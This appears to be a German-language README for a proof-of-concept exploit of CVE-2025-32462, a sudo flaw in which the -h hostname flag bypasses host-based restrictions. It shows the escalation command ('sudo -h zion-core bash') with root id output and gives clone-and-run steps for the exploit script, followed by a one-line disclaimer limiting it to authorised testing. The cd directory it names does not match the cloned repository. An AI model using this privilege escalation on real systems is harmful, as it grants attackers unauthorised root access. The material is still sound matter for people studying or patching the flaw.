
CVE-2025-32462 Exploit
Hostname-Spoofing-Privilegieneskalation (CVE-2025-32462)
„Du nimmst die blaue Pille… die Geschichte endet. Du nimmst die rote Pille… du bekommst root.“
Dieser Exploit demonstriert eine Privilegieneskalations-Schwachstelle in sudo (CVE-2025-32462), bei der hostnamenbasierte Einschränkungen mit dem -h-Flag umgangen werden können. Der PoC erstellt eine eingeschränkte Benutzerumgebung und entkommt dieser, indem er einen whitelisteten Hostnamen spoofed, um Root-Zugriff zu erlangen.
[user@matrix-node]$ sudo -h zion-core bash # Whitelisteten Hostnamen spoofen
[root@matrix-node]# id # Root auf falschem Hostnamen erhalten!
uid=0(root) gid=0(root) groups=0(root)
Repository klonen:
git clone https://github.com/cybersentinelx1/CVE-2025-32462-Exploit.git
cd matrix-sudo-escape
Ausführbar machen und ausführen:
chmod +x matrix-sudo-escape.sh
./matrix-sudo-escape.sh
Interaktive Anweisungen befolgen, um zu demonstrieren:
Nur für Bildungs-/Forschungszwecke. Nur auf Systemen verwenden, die Ihnen gehören oder für die Sie eine Testgenehmigung haben.